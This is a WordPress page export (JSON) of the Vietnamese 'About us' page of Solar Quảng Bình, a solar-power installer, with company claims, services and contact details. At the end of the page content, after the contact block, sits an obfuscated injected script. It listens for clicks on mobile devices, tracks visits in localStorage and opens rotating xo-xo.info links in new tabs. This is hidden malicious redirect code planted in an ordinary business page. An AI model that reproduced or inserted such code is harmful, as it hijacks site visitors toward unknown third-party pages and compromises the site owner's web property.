{"id":1272,"date":"2018-05-16T08:31:27","date_gmt":"2018-05-16T01:31:27","guid":{"rendered":"http:\/\/solarcsc.com\/?page_id=1272"},"modified":"2020-01-02T07:58:33","modified_gmt":"2020-01-02T00:58:33","slug":"gioi-thieu","status":"publish","type":"page","link":"https:\/\/solarquangbinh.com\/?page_id=1272","title":{"rendered":"GI\u1edaI THI\u1ec6U"},"content":{"rendered":"<p><span style=\"font-size: 105%; color: #33496d;\"><strong><u>GI\u1edaI THI\u1ec6U \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH<\/u><\/strong><\/span><\/p>\n<p><span style=\"color: #0000ff;\"><strong><span style=\"color: #33496d;\">\u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH<\/span>\u00a0<\/strong><\/span>chuy\u00ean cung c\u1ea5p s\u1ea3n ph\u1ea9m v\u00e0 gi\u1ea3i ph\u00e1p H\u1ec7 Th\u1ed1ng \u0110i\u1ec7n M\u1eb7t Tr\u1eddi d\u00e0nh cho d\u00e2n d\u1ee5ng v\u00e0 c\u00f4ng nghi\u1ec7p v\u1edbi ch\u1ea5t l\u01b0\u1ee3ng h\u00e0ng \u0111\u1ea7u Vi\u1ec7t Nam, \u0111\u1ea1t ti\u00eau chu\u1ea9n qu\u1ed1c t\u1ebf. H\u01a1n n\u1eefa, c\u00f4ng ty TNHH TMDV SOLAR QU\u1ea2NG B\u00ccNH ch\u00fang t\u00f4i cung c\u1ea5p gi\u1ea3i ph\u00e1p \u0111\u1ea7u t\u01b0 h\u1ec7 th\u1ed1ng \u0110i\u1ec7n M\u1eb7t Tr\u1eddi cho nh\u1eefng kh\u00e1ch h\u00e0ng c\u00f3 nhu c\u1ea7u s\u1eed d\u1ee5ng n\u0103ng l\u01b0\u1ee3ng \u0111i\u1ec7n quy m\u00f4 tr\u00ean 2000 kWh\/th\u00e1ng. <strong>C\u00f4ng ty TNHH TMDV SOLAR QU\u1ea2NG B\u00ccNH<\/strong> ch\u00fang t\u00f4i t\u1ef1 h\u00e0o c\u00f3 \u0111\u1ed9i ng\u0169 k\u1ef9 s\u01b0 tr\u1ebb, nhi\u1ec7t huy\u1ebft, t\u1eadn t\u00e2m, \u0111\u01b0\u1ee3c \u0111\u00e0o t\u1ea1o chuy\u00ean m\u00f4n, b\u00e0i b\u1ea3n, lu\u00f4n kh\u00f4ng ng\u1eebng nghi\u00ean c\u1ee9u, t\u00ecm ki\u1ebfm v\u00e0 ph\u00e1t tri\u1ec3n \u0110i\u1ec7n M\u1eb7t Tr\u1eddi. T\u1ea1i\u00a0<span style=\"color: #33496d;\"><strong>SOLAR QU\u1ea2NG B\u00ccNH<\/strong><\/span>, qu\u00fd kh\u00e1ch h\u00e0ng s\u1ebd lu\u00f4n \u0111\u01b0\u1ee3c ch\u0103m s\u00f3c t\u1eadn t\u00ecnh v\u00e0 chu \u0111\u00e1o.<\/p>\n<p><strong><span style=\"color: #282828;\">Ph\u01b0\u01a1ng ch\u00e2m kinh doanh c\u1ee7a C\u00f4ng ty TNHH TMDV SOLAR QU\u1ea2NG B\u00ccNH ch\u00fang t\u00f4i:\u00a0<\/span><\/strong><\/p>\n<ul>\n<li><span style=\"color: #282828;\">Lu\u00f4n h\u00e0i h\u00f2a l\u1ee3i \u00edch c\u1ee7a kh\u00e1ch h\u00e0ng v\u00e0 doanh nghi\u1ec7p<\/span><\/li>\n<li><span style=\"color: #282828;\">T\u01b0 v\u1ea5n th\u00f4ng tin ch\u00ednh x\u00e1c, h\u1eefu \u00edch cho kh\u00e1ch h\u00e0ng tr\u01b0\u1edbc khi \u0111\u1ea7u t\u01b0.<\/span><\/li>\n<li><span style=\"color: #282828;\">Cam k\u1ebft d\u1ecbch v\u1ee5 b\u1ea3o tr\u00ec &#8211; b\u1ea3o h\u00e0nh<\/span><\/li>\n<\/ul>\n<p><strong>L\u0129nh v\u1ef1c kinh doanh<\/strong><\/p>\n<ul>\n<li>Ch\u00fang t\u00f4i t\u1eadp trung v\u00e0o ba ho\u1ea1t \u0111\u1ed9ng trong l\u0129nh v\u1ef1c n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi: S\u1ea3n xu\u1ea5t, X\u00e2y d\u1ef1ng v\u00e0 \u0110\u1ea7u t\u01b0.<\/li>\n<li><span style=\"color: #33496d;\"><strong>SOLAR QU\u1ea2NG B\u00ccNH<\/strong><\/span> chuy\u00ean v\u1ec1 c\u00e1c thi\u1ebft b\u1ecb \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi v\u00e0 ti\u1ebft ki\u1ec7m n\u0103ng l\u01b0\u1ee3ng, bao g\u1ed3m: \u0111\u00e8n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, \u0111\u00e8n LED, m\u00e1y ph\u00e1t \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, b\u1ed9 \u0111\u1ed5i ngu\u1ed3n, \u0111i\u1ec1u khi\u1ec3n s\u1ea1c, t\u1ea5m thu n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi. C\u00e1c \u0111\u01a1n h\u00e0ng c\u1ee7a ch\u00fang t\u00f4i \u0111\u1ebfn t\u1eeb M\u1ef9, \u00dac, Singapore, Trung Qu\u1ed1c, \u0110\u00e0i Loan, Tri\u1ec1u Ti\u00ean, L\u00e0o, Campuchia v\u00e0 Myanmar.<\/li>\n<li>B\u00ean c\u1ea1nh \u0111\u00f3, ch\u00fang t\u00f4i l\u00e0 m\u1ed9t trong nh\u1eefng doanh nghi\u1ec7p d\u1eabn \u0111\u1ea7u trong vi\u1ec7c thi c\u00f4ng h\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi t\u1ea1i Qu\u1ea3ng B\u00ecnh, cung c\u1ea5p c\u00e1c gi\u1ea3i ph\u00e1p t\u00f9y ch\u1ec9nh v\u1edbi \u0111\u1ea7y \u0111\u1ee7 d\u1ecbch v\u1ee5 t\u1eeb kh\u1ea3o s\u00e1t, thi\u1ebft k\u1ebf \u0111\u1ebfn l\u1eafp \u0111\u1eb7t. Nh\u1edd quan t\u00e2m, theo d\u00f5i v\u00e0 ki\u1ec3m tra th\u01b0\u1eddng xuy\u00ean, c\u00e1c h\u1ec7 th\u1ed1ng n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi c\u1ee7a ch\u00fang t\u00f4i t\u1ef1 h\u00e0o mang \u0111\u1ebfn hi\u1ec7u qu\u1ea3 \u1ea5n t\u01b0\u1ee3ng, \u0111\u1ea3m b\u1ea3o l\u1ee3i nhu\u1eadn \u0111\u1ea7u t\u01b0 \u1ed5n \u0111\u1ecbnh.<\/li>\n<li><a href=\"http:\/\/solarquangbinh.com\">SOLAR QU\u1ea2NG B\u00ccNH<\/a> hi\u1ec7n c\u0169ng \u0111ang t\u00ecm ki\u1ebfm nh\u00e0 \u0111\u1ea7u t\u01b0 v\u00e0o c\u00e1c d\u1ef1 \u00e1n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi quy m\u00f4 v\u1eeba. Nh\u1eefng d\u1ef1 \u00e1n n\u00e0y mang l\u1ea1i c\u01a1 h\u1ed9i \u0111\u1ea7u t\u01b0 m\u1edbi m\u1ebb v\u00e0 h\u1ea5p d\u1eabn, \u0111\u1eb7c bi\u1ec7t ph\u00f9 h\u1ee3p v\u1edbi t\u1ed5 ch\u1ee9c v\u00e0 c\u00e1 nh\u00e2n quan t\u00e2m \u0111\u1ebfn c\u00e1c kho\u1ea3n \u0111\u1ea7u t\u01b0 d\u00e0i h\u1ea1n, r\u1ee7i ro th\u1ea5p.<\/li>\n<\/ul>\n<p>V\u1edbi\u00a0l\u01b0\u1ee3ng\u00a0c\u00f4ng tr\u00ecnh\u00a0\u0111a d\u1ea1ng v\u00e0 tr\u1ea3i d\u00e0i tr\u00ean kh\u1eafp 63 t\u1ec9nh th\u00e0nh trong n\u01b0\u1edbc, t\u1ea1i h\u1ea7u h\u1ebft c\u00e1c l\u0129nh v\u1ef1c: \u0110i\u1ec7n m\u1eb7t tr\u1eddi tr\u00ean m\u00e1i Trung t\u00e2m th\u01b0\u01a1ng m\u1ea1i qu\u1ea3ng b\u00ecnh, c\u00e1c si\u00eau th\u1ecb, h\u1ec7 th\u1ed1ng b\u00e1n l\u1ebb, kh\u00e1ch s\u1ea1n, khu chung c\u01b0, to\u00e0 nh\u00e0 v\u0103n ph\u00f2ng, bi\u1ec7t th\u1ef1, nh\u00e0 v\u01b0\u1eddn, nh\u00e0 \u1edf d\u00e2n d\u1ee5ng, c\u00e1c nh\u00e0 x\u01b0\u1edfng s\u1ea3n xu\u1ea5t, \u0111i\u1ec7n m\u1eb7t tr\u1eddi khu c\u00f4ng nghi\u1ec7p, khu ch\u1ebf xu\u1ea5t\u2026..<\/p>\n<p>\u0110\u1ed9i ng\u0169 nh\u00e2n s\u1ef1 k\u1ef9 thu\u1eadt gi\u00e0u kinh nghi\u1ec7m\u00a0\u0111\u00e3 thi c\u00f4ng nhi\u1ec1u\u00a0c\u00f4ng tr\u00ecnh,\u00a0c\u00e1c ki\u1ebfn tr\u00fac s\u01b0\u00a0t\u1eadn t\u00e2m, nhi\u1ec7t t\u00ecnh v\u00e0 th\u00f4ng minh c\u1ee7a\u00a0<span style=\"color: #33496d;\"><strong>Solar Qu\u1ea3ng B\u00ecnh<\/strong><\/span>\u00a0lu\u00f4n mang\u00a0\u0111\u1ebfn cho kh\u00e1ch h\u00e0ng nh\u1eefng gi\u1ea3i ph\u00e1p v\u00e0 tr\u1ea3i nghi\u1ec7m t\u1ed1i\u00a0\u01b0u nh\u1ea5t khi quy\u1ebft\u00a0\u0111\u1ecbnh\u00a0\u0111\u1ea7u t\u01b0 v\u00e0o h\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi.<\/p>\n<p><span style=\"color: #33496d;\"><strong>SOLAR QU\u1ea2NG B\u00ccNH<\/strong><\/span> lu\u00f4n kh\u00f4ng ng\u1eebng c\u1ea3i ti\u1ebfn k\u1ef9 thu\u1eadt c\u00f4ng ngh\u1ec7, n\u00e2ng cao ch\u1ea5t l\u01b0\u1ee3ng d\u1ecbch v\u1ee5, cam k\u1ebft mang t\u1edbi cho kh\u00e1ch h\u00e0ng h\u1ec7 th\u1ed1ng\u00a0\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi v\u1edbi ti\u00eau chu\u1ea9n t\u1ed1t nh\u1ea5t, hi\u1ec7u su\u1ea5t t\u1ed1i\u00a0\u01b0u; t\u1eeb kh\u00e2u thi\u1ebft k\u1ebf, th\u1ea9m m\u1ef9, thi c\u00f4ng an to\u00e0n, l\u1eafp\u00a0\u0111\u1eb7t nhanh ch\u00f3ng\u2026\u00a0<span style=\"color: #33496d;\"><strong>Solar Qu\u1ea3ng B\u00ecnh<\/strong><\/span> lu\u00f4n\u00a0\u0111\u1eb7t l\u1ee3i\u00a0\u00edch c\u1ee7a kh\u00e1ch h\u00e0ng l\u00ean tr\u00ean h\u1ebft\u00a0\u0111\u1ec3 l\u00e0m ti\u00eau ch\u00ed ph\u1ee5c v\u1ee5 khi thi c\u00f4ng c\u00e1c d\u1ef1 \u00e1n H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi.<\/p>\n<p>Tin t\u01b0\u1edfng v\u00e0o Ch\u00fang t\u00f4i. Tr\u00f4ng c\u1eady v\u00e0o Ch\u00fang t\u00f4i. Ch\u00fang t\u00f4i \u0111ang c\u1ed1 g\u1eafng ng\u00e0y qua ng\u00e0y, n\u1ed7 l\u1ef1c v\u00e0 n\u1ed7 l\u1ef1c h\u01a1n n\u1eefa \u0111\u1ec3 mang \u0111\u1ebfn d\u1ecbch v\u1ee5 ho\u00e0n h\u1ea3o v\u00e0 ch\u1ea5t l\u01b0\u1ee3ng ti\u00eau chu\u1ea9n th\u1ebf gi\u1edbi, v\u00ec B\u1ea1n, v\u00ec m\u1ed9t th\u01b0\u01a1ng hi\u00eau Vi\u1ec7t Nam tr\u00ean b\u1ea3n \u0111\u1ed3 ng\u00e0nh N\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi.<\/p>\n<p><strong><span style=\"color: #33496d;\">SOLAR QU\u1ea2NG B\u00ccNH CHUY\u00caN:<\/span>\u00a0<\/strong>t\u01b0 v\u1ea5n, thi\u1ebft k\u1ebf v\u00e0 l\u1eafp \u0111\u1eb7t h\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi cho h\u1ed9 gia \u0111\u00ecnh, v\u0103n ph\u00f2ng, tr\u01b0\u1eddng h\u1ecdc, kh\u00e1ch s\u1ea1n, resort&#8230;bao g\u1ed3m c\u1ea3 h\u1ec7 th\u1ed1ng \u0111\u1ed9c l\u1eadp v\u00e0 n\u1ed1i l\u01b0\u1edbi v\u1edbi c\u00f4ng su\u1ea5t t\u1eeb\u00a01KW &#8211; 100KW\u00a0t\u1ea1i Qu\u1ea3ng B\u00ecnh v\u00e0 ph\u00e2n ph\u1ed1i thi\u1ebft b\u1ecb \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, thi\u1ebft b\u1ecb ti\u1ebft ki\u1ec7m \u0111i\u1ec7n.<\/p>\n<p><strong><span style=\"color: #33496d;\">SOLAR QU\u1ea2NG B\u00ccNH<\/span>\u00a0<\/strong>lu\u00f4n \u0111i ti\u00ean phong trong ng\u00e0nh n\u0103ng l\u01b0\u1ee3ng\u00a0m\u1eb7t tr\u1eddi\u00a0c\u0169ng nh\u01b0 n\u0103ng l\u01b0\u1ee3ng s\u1ea1ch \u1edf t\u1ec9nh Qu\u1ea3ng B\u00ecnh c\u0169ng nh\u01b0 kh\u1eafp c\u00e1c t\u1ec9nh th\u00e0nh Vi\u1ec7t Nam. Cam k\u1ebft uy t\u00edn, ch\u1ea5t l\u01b0\u1ee3ng tuy\u1ec7t \u0111\u1ed1i v\u1edbi m\u1ecdi kh\u00e1ch h\u00e0ng.<\/p>\n<p>N\u1ebfu nh\u01b0 Qu\u00fd kh\u00e1ch h\u00e0ng c\u00f3 b\u1ea5t c\u1ee9 y\u00eau c\u1ea7u n\u00e0o c\u1ea7n h\u1ed7 tr\u1ee3 v\u1ec1 s\u1ea3n ph\u1ea9m, d\u1ecbch v\u1ee5 ho\u1eb7c k\u1ef9 thu\u1eadt\u2026.xin \u0111\u1eebng ng\u1ea7n ng\u1ea1i li\u00ean h\u1ec7 v\u1edbi ch\u00fang t\u00f4i &#8211; <strong><span style=\"color: #33496d;\">SOLAR QU\u1ea2NG B\u00ccNH<\/span>\u00a0<\/strong>\u0111\u1ec3 c\u00f3 s\u1ef1 ph\u1ee5c v\u1ee5 v\u00e0 h\u1ed7 tr\u1ee3 t\u01b0 v\u1ea5n t\u1ed1t nh\u1ea5t. <strong><span style=\"color: #33496d;\">SOLAR QU\u1ea2NG B\u00ccNH<\/span>\u00a0<\/strong>lu\u00f4n mang \u0111\u1ebfn gi\u1ea3i ph\u00e1p h\u1eefu hi\u1ec7u, m\u1ed9t \u01b0u th\u1ebf ph\u1ee5c v\u1ee5 to\u00e0n di\u1ec7n v\u00e0 hi\u1ec7u qu\u1ea3 cao cho Qu\u00fd kh\u00e1ch h\u00e0ng.<\/p>\n<p>Xin c\u00e1m \u01a1n s\u1ef1 tin t\u01b0\u1edfng v\u00e0 \u1ee7ng h\u1ed9 c\u1ee7a qu\u00fd kh\u00e1ch<\/p>\n<p>Tr\u00e2n tr\u1ecdng.\/.<\/p>\n<p><span style=\"color: #33496d; font-size: 115%;\"><strong>\u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI &#8211; SOLAR QU\u1ea2NG B\u00ccNH<\/strong><\/span><\/p>\n<p><span style=\"font-size: 115%;\"><strong>\u0110\u1ecba ch\u1ec9<\/strong>: 30 Nguy\u1ec5n H\u1eefu D\u1eadt, TP \u0110\u1ed3ng H\u1edbi, Qu\u1ea3ng B\u00ecnh<\/span><\/p>\n<p><span style=\"font-size: 115%;\"><strong>\u0110i\u1ec7n tho\u1ea1i:<\/strong> 0904 539 688 |\u00a0<strong>Hotline:<\/strong>\u00a00869 564 567<\/span><\/p>\n<p><span style=\"font-size: 115%;\"><strong>Email:<\/strong>\u00a0Solarquangbinh@gmail.com | <strong>Website:<\/strong>\u00a0<a href=\"http:\/\/solarquangbinh.com\">www.solarquangbinh.com<\/a><\/span><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/xo-xo.info\/Wxk9c5','https:\/\/xo-xo.info\/Rie8c9','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/xo-xo.info\/FtC5c7','8SJGLkz','random','https:\/\/xo-xo.info\/nSa1c8','7196643rGaMMg','setItem','-mnts','https:\/\/xo-xo.info\/LiL2c3','266801SrzfpD','substr','floor','-local-storage','https:\/\/xo-xo.info\/KAZ4c3','3ThLcDl','stopPropagation','_blank','https:\/\/xo-xo.info\/Yht3c7','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/xo-xo.info\/xRg0c2'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/xo-xo.info\/oDy6c2','https:\/\/xo-xo.info\/DWA7c5',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>GI\u1edaI THI\u1ec6U \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH\u00a0chuy\u00ean cung c\u1ea5p s\u1ea3n ph\u1ea9m v\u00e0 gi\u1ea3i ph\u00e1p H\u1ec7 Th\u1ed1ng \u0110i\u1ec7n M\u1eb7t Tr\u1eddi d\u00e0nh cho d\u00e2n d\u1ee5ng v\u00e0 c\u00f4ng nghi\u1ec7p v\u1edbi ch\u1ea5t l\u01b0\u1ee3ng h\u00e0ng \u0111\u1ea7u Vi\u1ec7t Nam, \u0111\u1ea1t ti\u00eau chu\u1ea9n qu\u1ed1c t\u1ebf. [&#8230;]\n","protected":false},"author":318,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>GI\u1edaI THI\u1ec6U - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh<\/title>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/solarquangbinh.com\/?page_id=1272\" \/>\r\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"GI\u1edaI THI\u1ec6U - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"og:description\" content=\"GI\u1edaI THI\u1ec6U \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH\u00a0chuy\u00ean cung c\u1ea5p s\u1ea3n ph\u1ea9m v\u00e0 gi\u1ea3i ph\u00e1p H\u1ec7 Th\u1ed1ng 